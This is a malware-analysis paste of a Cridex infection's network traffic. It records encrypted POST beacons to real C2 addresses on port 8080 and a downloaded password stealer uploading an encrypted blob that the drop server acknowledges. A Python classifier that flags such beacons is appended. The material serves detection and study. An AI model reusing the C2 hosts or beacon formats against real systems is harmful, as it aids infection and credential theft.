Cridex + downloaded password stealer Network Traffic

MalwareMustDie, Dec 15th, 2012
-----------details-internet traffic-------------------
// Try to reach 208.87.243.18
192.168.7.84    208.87.243.18   TCP     sbl > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
208.87.243.18   192.168.7.84    TCP     http-alt > sbl [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// An HTTP POST to 74.207.237.170:8080
192.168.7.84    74.207.237.170:8080     HTTP    POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 74.207.237.170:8080
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache
......dU..ZP....Y.yy..|4$R.".....u...+T..1L.;I.n6v39.+..
DP.....O@xt,U..V|............c1..4~:
R.E.........K.:+.....Z`.. y.....e.z...B.....^...bG..B.opBx0E\
.....B..N.]....g.^......59.L.l.M.....>q)..Q...\5..p...M..q...
W-.*...u.P.\p......2.K..HM7..~Z?vX.p.W..0.m....A?.u....=|<.\.'
.......5._7'..46..G\.o" ....}...E..K...2eE..,.U.=.C....KtU....
u..2.~@

0000  00 a0 c9 22 b0 ee 00 12  f0 e9 3e 3e 08 00 45 00   ...".... ..>>..E.
0010  01 83 00 3f 40 00 80 06  f8 bf c0 a8 07 54 4a cf   ...?@... .....TJ.
0020  ed aa 04 11 1f 90 5a 54  91 b8 89 da 8f 5b 50 18   ......ZT .....[P.
0030  42 30 27 30 00 00 2e d7  f7 a7 03 ea 64 55 cf d6   B0'0.... ....dU..
0040  5a 50 e9 81 b2 b6 59 09  79 79 e6 b8 7c 34 24 52   ZP....Y. yy..|4$R
0050  a3 22 06 a4 11 86 ac 75  e0 08 b3 2b 54 12 a4 31   .".....u ...+T..1
 :             :                      :                        :
0130  70 18 57 c8 97 30 ac 6d  93 08 fb a2 41 3f aa 75   p.W..0.m ....A?.u
0140  c7 83 e7 af 3d 7c 3c ef  5c 05 27 83 1e 2e d1 9b   ....=|<. \.'.....
0150  88 df 35 1f 5f 37 27 f1  f9 34 36 0e b0 47 5c b7   ..5._7'. .46..G\.
0160  6f 22 20 16 cb e9 9c 7d  01 98 08 45 9f a5 4b bf   o" ....} ...E..K.
0170  d5 90 32 65 45 e4 e9 2c  b0 55 1d 3d ca 43 e2 e8   ..2eE.., .U.=.C..
0180  d8 d5 4b 74 55 e1 f6 9e  8d 75 a1 92 32 1c 7e 40   ..KtU... .u..2.~@
0190  7c                                                 |

// The reply is a long block of encrypted binary data...

Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 09:58:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
f3b
.}.%..k..o.-..U...........C..8.C.0...o...E.d... snip
2U...`......p_| ]X.$...B..A.F....}.snip
.@C...4*j..|.\..%..xv-.....snip
.1..x.....2.....`3....3.1..7......M.k..r-5s.8P=snip
z.nT^MV..{+=3ym........Gj.3JV....x..xe{@.......snip
[.UK.un2.>.W`..{.9'+.7*f..v.................F.M.snip
v....[...M.O.......P2.....;..a\..^..Rv&..9P...xsnip
n..Z...fG..t...1.|...`Vsnip
...#^&5.[...K...!i}...}.44...@...Zp`.."....*...snip
%.(.....T .C.Md.#-.{q........G.&5+.N.,.R.....V>snip
.g.{1...d..+t....T.g$....#..bMQ.f.5x.....pM'"a.snip
   :
   :snip
   :
.%......8{..6...J..$:?..E.+..C"...V'uZ1M..$Cy6}.1snip
3.!.i~..N.a..;^..+..a..[..J.~...7}....W...q.rR..n(."snip
.<p....N....,..v......R...d..U_...?....k...-.....E%.snip
...a.AZ$......H...7r......
0

// Some more communication: try to connect to 132.248.49.112

192.168.7.84    132.248.49.112  TCP     afrog > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
132.248.49.112  192.168.7.84    TCP     http-alt > afrog [RST, ACK] Seq=1 Ack=1 Win=0 Len=0


// At this point the previously received data was saved in the %Temp% folder:


FileName: exp2.tmp.exe
timeStamp: 2012/12/15 18:58 122,880
MD5 ce7474646297ed818bb8ed48f50c7e1e


// DNS requests to...

112.49.248.132.in-addr.arpa web.ecologia.unam.mx
77.65.130.113.in-addr.arpa  ns.shinbiro.com..domain

00000000  35 ea 01 00 00 01 00 00  00 00 00 00 03 31 31 32 5....... .....112
00000010  02 34 39 03 32 34 38 03  31 33 32 07 69 6e 2d 61 .49.248. 132.in-a
00000020  64 64 72 04 61 72 70 61  00 00 0c 00 01          ddr.arpa .....
    00000000  35 ea 81 80 00 01 00 01  00 00 00 00 03 31 31 32 5....... .....112
    00000010  02 34 39 03 32 34 38 03  31 33 32 07 69 6e 2d 61 .49.248. 132.in-a
    00000020  64 64 72 04 61 72 70 61  00 00 0c 00 01 c0 0c 00 ddr.arpa ........
    00000030  0c 00 01 00 00 1c 1f 00  16 03 77 65 62 08 65 63 ........ ..web.ec
    00000040  6f 6c 6f 67 69 61 04 75  6e 61 6d 02 6d 78 00    ologia.u nam.mx.
0000002D  cb 61 01 00 00 01 00 00  00 00 00 00 02 37 37 02 .a...... .....77.
0000003D  36 35 03 31 33 30 03 31  31 33 07 69 6e 2d 61 64 65.130.1 13.in-ad
0000004D  64 72 04 61 72 70 61 00  00 0c 00 01             dr.arpa. ....
    0000004F  cb 61 81 83 00 01 00 00  00 01 00 00 02 37 37 02 .a...... .....77.
    0000005F  36 35 03 31 33 30 03 31  31 33 07 69 6e 2d 61 64 65.130.1 13.in-ad
    0000006F  64 72 04 61 72 70 61 00  00 0c 00 01 c0 0f 00 06 dr.arpa. ........
    0000007F  00 01 00 00 07 07 00 2e  02 6e 73 08 73 68 69 6e ........ .ns.shin
    0000008F  62 69 72 6f 03 63 6f 6d  00 06 64 6f 6d 61 69 6e biro.com ..domain
    0000009F  c0 3b 77 bf 64 79 00 00  2a 30 00 00 0e d8 00 12 .;w.dy.. *0......
    000000AF  75 00 00 01 51 80                                u...Q.


// Another POST detected, to 203.113.98.131:80
POST /asp/intro.php HTTP/1.0
Host: 203.113.98.131
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 257
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

CRYPTED0...DK.V..aa..c.....PI%.^D.|2.s;.p..T=....*.........MX.../......../.;(.dl7).c..).......Jk.rO..e....!].......w
.....}..5.+..6.SD4.>
t......K...M........\..G...7V/..5].....|.....#.....=.P*^k.....b3cm.8..6..O...T....$|.......yb.~#...k0.|........o...[JD.HTTP/1.1 200 OK

Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:01:37 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 16

STATUS-IMPORT-OK

// At this point the malware process exp2.tmp.exe was started....


---------------take 2---------------------

// send ACK packet (try to connect) to 74.207.237.170

192.168.7.84    74.207.237.170  TCP     danf-ak2 > http-alt [RST, ACK] Seq=1 Ack=1 Win=0 Len=0


// send ping to 209.190.61.50

209.190.61.50   192.168.7.84    ICMP    Time-to-live exceeded (Time to live exceeded in transit)
209.190.61.50   192.168.7.84    ICMP    Time-to-live exceeded (Time to live exceeded in transit)


// Communication via HTTP/POST with 174.143.174.136:8080

// post...
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 174.143.174.136:8080
Content-Length: 408
Connection: Keep-Alive
Cache-Control: no-cache
.m......(...P..0.w.j."...V....s.x.....c.....FH..?.. .I.t..`....OA&../.?$..._J..
.....b...ws.'I..l..r........}....+`91.R..+..P.....7q..+Q...........-\g'G.6..l...rV..[.4S..K.5'!?...=.......S...2AkUh..S....b4..#....!.$.
.+d;K..].>&....._g.w...i)..}.,.....f..YD.G.KI....9......rZ
.~q.+......Sk.i...........t....!.m*......;..w."...[.'
..i...:..$..w.....X1gR+..U}b..U..../....(...K.FIAVR..4.....,...ujk...i....H..eHTTP/1.1 200 OK

// reply:
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:13:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`......\z#W.2.Pp_..NU..


// post...
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 174.143.174.136:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
........b,.B..k'..`.9...r...7)@.~..^..E..o....y..YP .o...*gp......y..w........QF..^...J.......oV)vs..0eh....H....h7.K%Q,.c..I.U~S...\..?....g...Re,...\.?<.]2~.kw..M..t._.?.z.M<...h.-..Q.W.......Dg.3.1.."{Tf..RKw..9".T.......-."
..f(X..8..._...3*~+.%..Y.FH...\..:../.!.1G.I9..........o).........6*dXm.|-....$.6.. ..........8.....TJ...U....4TX.IdJ|b.=.e....h.G.....A...>.pC6.......]t..C'..HTTP/1.1 200 OK

// reply...
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:13:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`........X.'8...".~K..J.



// Try to establish connection with 199.71.215.194

192.168.7.84    199.71.215.194  TCP     cognex-insight > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
199.71.215.194  192.168.7.84    TCP     http-alt > cognex-insight [RST, ACK] Seq=1 Ack=1 Win=0 Len=0


// Communication via HTTP/POST with 210.56.23.100:8080

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 210.56.23.100:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
./Pl$,........*|.`..9...R{...B.....A...#.H..K.=e.......(.np...nn..y...M a.........2S...S..{|?....A.k..........
..Q#.g..~........S...\..?....g...Re,....s.I..]..,......@I.R..P.n....I;te.<&......-9.!......8j...R.......Y....*.D&..={pY.3.l".;......xn..g.N.....T..,>..rOJ!..D=.>.J..
.(q..... ..P&....m.u6.....?....#.).W.........z....(.FF
V.R
...-v!..38s)ab|....bKU..$..S..</.
)4..1+...>.O.....HTTP/1.1 200 OK

Server: nginx/1.0.11
Date: Sat, 15 Dec 2012 10:05:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`.........c.M..A..9.....

// try to connect again with 132.248.49.112

192.168.7.84    132.248.49.112  TCP     rdrmshc > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
132.248.49.112  192.168.7.84    TCP     http-alt > rdrmshc [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// try to connect w/ 74.117.61.66

192.168.7.84    74.117.61.66    TCP     socks > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
74.117.61.66    192.168.7.84    TCP     http-alt > socks [RST, ACK] Seq=1 Ack=1 Win=0 Len=0


// Communication via HTTP/POST with 210.56.23.100:8080

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 210.56.23.100:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
./Pl$,........*|.`..9...R{...B.....A...#.H..K.=e.......(.np...nn..y...M a.........2S...S..{|?....A.k..........
..Q#.g..~........S...\..?....g...Re,....s.I..]..,......@I.R..P.n....I;te.<&......-9.!......8j...R.......Y....*.D&..={pY.3.l".;......xn..g.N.....T..,>..rOJ!..D=.>.J..
.(q..... ..P&....m.u6.....?....#.).W.........z....(.FF
V.R
...-v!..38s)ab|....bKU..$..S..</.
)4..1+...>.O.....HTTP/1.1 200 OK

Server: nginx/1.0.11
Date: Sat, 15 Dec 2012 10:05:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`.........c.M..A..9.....


// Try to communicate w/ 173.192.229.36

173.192.229.36  192.168.7.84    TCP     http-alt > mctp [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
192.168.7.84    173.192.229.36  TCP     mctp > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1


// Communication via HTTP/POST with 69.64.89.82:8080


POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 69.64.89.82:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
..[.
8.|.
. ...+...n.^.7.Mh=..R......Y....I.r$.O.....j..g..7l.4p#&....H.G5..P-.........ld}.l[......xd&..?
....)...>))'D;vgQ.....S...\..?....g...Re,.O..j.~y....+..?.S......a..5.....L.%.3v.........
.......g.Xf...f..0.i`f..].E~\Z..4.G.....Nn.b..~......Dw.N...S.iW.......oI...W....t.!Hp.#8h..uAK...4L......j....f...]./
.e...3k.o.b......T....[lm^8.X......l...."+9...2.v.\...GN..-....?.A".5wkRHTTP/1.1 200 OK

Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 02:51:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`......O..z.zj....>..;..


// try to establish conn to: 173.224.221.135

192.168.7.84    173.224.221.135 TCP     ltp-deepspace > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
173.224.221.135 192.168.7.84    TCP     http-alt > ltp-deepspace [RST, ACK] Seq=1 Ack=1 Win=0 Len=0


// try to establish conn to: 59.90.221.6

192.168.7.84    59.90.221.6     TCP     ardus-trns > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
59.90.221.6     192.168.7.84    TCP     http-alt > ardus-trns [RST, ACK] Seq=1 Ack=1 Win=0 Len=0


// try to establish conn to: 180.235.150.72

192.168.7.84    180.235.150.72  TCP     sacred > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
180.235.150.72  192.168.7.84    TCP     http-alt > sacred [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// Communication via HTTP/POST with 123.49.61.59:8080

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 123.49.61.59:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
...:..'....F..oP.Ka.2U.d....N~9..|.....,..
...
8....!'......Cr..,.8
..F[....z.%_...p.L..........C':.rq.t...U..H..7.b.........I.IS...\..?....g...Re,..C...V..:...D.....W.3..jO...Sh`j.4.,....A.#..zcm.G.....D.6..4/.........s4\>..G.dh...........-........).%j...-mG..#W.......&d.....g.Y..(.w.Vs&.rj...uAV....>^1.J.J..4.....M...Rp..%..n.k.....wt....x........}.z`..d.:.$
..9..:...;I\....G/.G....HTTP/1.1 200 OK

Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:29:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`.......^...R.L&F..x....POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1

Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 123.49.61.59:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
g..7...:R...g\.....F......@..8B..w...}.28..^....})u...ZR.exi.f......h..T..s..j..4..'m.E....SZ?.R@f.
.l...(>..U.~N=;..Z......&...S...\..?....g...Re,.,.".+..y.&U..X.f...G7J.$ s
..7#?..3..b.UC.]....`.-.,.......v....C......F9'.&...Q.L..A..6+..N.Vx.......+.R..o.l...%.Q.qSR.W..IBpoy...Y. n..7b
..jW.qO.*.j.'..f)I_7.
R...5.0AY7....m..X...>..\M.QN.p.r.P.&f......Y.0.'..!e..j.s.-w>.HwL..j.0..[.
HTTP/1.1 200 OK

Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:30:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`......,.&.3.."cz@..[.a.


// Communication via HTTP/POST with 123.49.61.59:8080

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 123.49.61.59:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
.K.Vn%d...;.Q6K.vq..)...T...e.,....c.q.K..............-.....t:.Hy(.....K.....t.d.......L,..7...}%..h&...?..)..*.@....Hg...ys.$A.S...\..?....g...Re,....H1ij..b.KC.....DJ....y.C2.I.0....#.4
...H...hi....~.T%5.M*v..z`..v....r..b....K.yQ...Se..5....Z2.r.+...H9..8.^A..>....".....]..&....\...`"/r...:e.mO..w.4..7...Q..!...Ll..(..I.M>x.\.Y>...ET...=.S.'.....(..(
...4Q.F.LN.......AI.&.*.w.u4..HTTP/1.1 200 OK

Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:29:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`.........X)myU.>.^....JPOST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1

Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 123.49.61.59:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
...:..'....F..oP.Ka.2U.d....N~9..|.....,..
...
8....!'......Cr..,.8
..F[....z.%_...p.L..........C':.rq.t...U..H..7.b.........I.IS...\..?....g...Re,..C...V..:...D.....W.3..jO...Sh`j.4.,....A.#..zcm.G.....D.6..4/.........s4\>..G.dh...........-........).%j...-mG..#W.......&d.....g.Y..(.w.Vs&.rj...uAV....>^1.J.J..4.....M...Rp..%..n.k.....wt....x........}.z`..d.:.$
..9..:...;I\....G/.G....HTTP/1.1 200 OK

Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:29:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`.......^...R.L&F..x....POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1

Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 123.49.61.59:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
g..7...:R...g\.....F......@..8B..w...}.28..^....})u...ZR.exi.f......h..T..s..j..4..'m.E....SZ?.R@f.
.l...(>..U.~N=;..Z......&...S...\..?....g...Re,.,.".+..y.&U..X.f...G7J.$ s
..7#?..3..b.UC.]....`.-.,.......v....C......F9'.&...Q.L..A..6+..N.Vx.......+.R..o.l...%.Q.qSR.W..IBpoy...Y. n..7b
..jW.qO.*.j.'..f)I_7.
R...5.0AY7....m..X...>..\M.QN.p.r.P.&f......Y.0.'..!e..j.s.-w>.HwL..j.0..[.
HTTP/1.1 200 OK

Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 10:30:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`......,.&.3.."cz@..[.a.


// Try to establish conn to: 113.130.65.77

192.168.7.84    113.130.65.77   TCP     hpvmmcontrol > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
113.130.65.77   192.168.7.84    TCP     http-alt > hpvmmcontrol [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// Try to establish conn to: 180.235.150.72

802     795.966247      192.168.7.84    180.235.150.72  TCP     saphostctrls > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
803     796.070637      180.235.150.72  192.168.7.84    TCP     http-alt > saphostctrls [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

// Communication via HTTP/POST with 69.64.89.82:8080


POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 69.64.89.82:8080
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache
.X...j.K.!L.C..............3.8.|...........w..9...W
.K.Q....se.....k....y.;..6=$..%%.O....k'....iu|......=.?u..]%....?../...\...S...\..?....g...Re,.]...n.G.j..0O.X.rQ
l...[.h.........-.zR..J\...".Q
w..Yv..}:n..R.....6z.S0......_+.sXx....3n!.w..]k.o...d;^......b...8.h8.g.a...C.|C...m...4.M..[
.T..3!k..T.U=1N.~d.c..C.m....
..}..&..y_5..u
..Z...Z4;.u@..|A..&..G|}._.\.L.....A....u..|`..'.

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 02:55:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 165
..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
.N%9M.k.......?...Z....|..=6.U...3o.h...F...5
.=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
2U...`......]...v.T.v..%s.\.$

-----------------------------internet data ends--------------------
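The beacons recorded above repeat a small set of observables: a POST to a literal IP on port 8080 with the path /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ and the MSIE 7.0 User-Agent, an opaque body, and a 165-byte nginx reply; and, for the downloaded stealer, a CRYPTED blob posted to /asp/intro.php that the server answers with STATUS-IMPORT-OK. The Python below turns those observables into a triage classifier over raw HTTP messages. It is an added example, not part of the MalwareMustDie paste: the indicator strings are copied from the capture, while the sample hosts (TEST-NET addresses), the body bytes and the two-indicator threshold are constructed choices of this example, not something the capture establishes.

```python
"""Flag HTTP POSTs shaped like the two beacons in the capture above.
Added example, not from the MalwareMustDie paste. Indicator values (paths,
User-Agents, CRYPTED magic, STATUS-IMPORT-OK, 165-byte reply) are copied from
the capture; the sample hosts (TEST-NET) and body bytes are constructed."""
import ipaddress

CRIDEX_PATH = "/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/"
CRIDEX_UA = "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
CRIDEX_REPLY_LEN = "165"
STEALER_PATH = "/asp/intro.php"
STEALER_UA = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
STEALER_MAGIC = b"CRYPTED"
STEALER_REPLY = b"STATUS-IMPORT-OK"


def parse_http(raw: bytes) -> tuple:
    """Split a raw request or response into (start_line, headers, body);
    header names are lower-cased so lookups do not depend on sender casing."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def host_is_raw_ip(host: str) -> tuple:
    """(True, port) for a literal-IP Host such as '1.2.3.4:8080', else (False, None)."""
    addr, _, port = host.partition(":")
    try:
        ipaddress.ip_address(addr)
    except ValueError:
        return False, None
    return True, int(port) if port.isdigit() else 80


def opaque_ratio(body: bytes) -> float:
    """Share of bytes outside printable ASCII; encrypted beacons sit near 1.0."""
    return sum(b < 0x20 or b > 0x7E for b in body) / len(body) if body else 0.0


def classify(request: bytes, response: bytes = None) -> dict:
    """Return a verdict plus the indicators that fired, for triage or alerting."""
    start, hdrs, body = parse_http(request)
    parts = start.split()
    if len(parts) < 2 or parts[0] != "POST":
        return {"verdict": None, "reasons": []}
    path, ua = parts[1], hdrs.get("user-agent", "")
    is_ip, port = host_is_raw_ip(hdrs.get("host", ""))
    resp_hdrs, resp_body = parse_http(response)[1:] if response is not None else ({}, b"")

    # Pattern 1: Cridex beacon. Two independent indicators are required so that
    # a lone spoofed User-Agent on ordinary traffic does not fire.
    hits = []
    if path == CRIDEX_PATH:
        hits.append("known C2 path")
    if ua == CRIDEX_UA:
        hits.append("Cridex User-Agent")
    if is_ip and port == 8080:
        hits.append("POST to literal IP on 8080")
    if opaque_ratio(body) > 0.3:
        hits.append("opaque (encrypted) body")
    if resp_hdrs.get("content-length") == CRIDEX_REPLY_LEN:
        hits.append("165-byte reply, as on every observed beacon")
    if len(hits) >= 2:
        return {"verdict": "cridex-c2", "reasons": hits}

    # Pattern 2: stealer upload of a CRYPTED blob, acknowledged by the drop server.
    if path == STEALER_PATH and body.startswith(STEALER_MAGIC):
        hits = ["CRYPTED blob posted to " + STEALER_PATH]
        if hdrs.get("content-type") == "application/octet-stream":
            hits.append("octet-stream upload")
        if ua == STEALER_UA:
            hits.append("MSIE 5.0 / Windows 98 User-Agent")
        if resp_body.strip() == STEALER_REPLY:
            hits.append("drop acknowledged the import: stolen data landed")
        return {"verdict": "stealer-upload", "reasons": hits}
    return {"verdict": None, "reasons": []}


# Constructed samples shaped like the capture (TEST-NET hosts, made-up body bytes).
SAMPLE_CRIDEX_POST = (
    b"POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1\r\nAccept: */*\r\n"
    b"User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)\r\n"
    b"Host: 203.0.113.10:8080\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n\r\n" + bytes(range(0x80, 0x98))
)
SAMPLE_CRIDEX_REPLY = (
    b"HTTP/1.1 200 OK\r\nServer: nginx/1.0.10\r\nContent-Type: text/html; charset=UTF-8\r\n"
    b"Connection: keep-alive\r\nContent-Length: 165\r\n\r\n" + bytes(165)
)
SAMPLE_STEALER_POST = (
    b"POST /asp/intro.php HTTP/1.0\r\nHost: 203.0.113.20\r\nAccept: */*\r\n"
    b"Content-Length: 16\r\nConnection: close\r\nContent-Type: application/octet-stream\r\n"
    b"Content-Encoding: binary\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n"
    b"\r\nCRYPTED0\x01\x02\x03\x04\x05\x06\x07\x08"
)
SAMPLE_STEALER_REPLY = (
    b"HTTP/1.1 200 OK\r\nServer: nginx/1.0.10\r\nContent-Type: text/html; charset=windows-1251\r\n"
    b"Connection: close\r\nContent-Length: 16\r\n\r\nSTATUS-IMPORT-OK"
)
```

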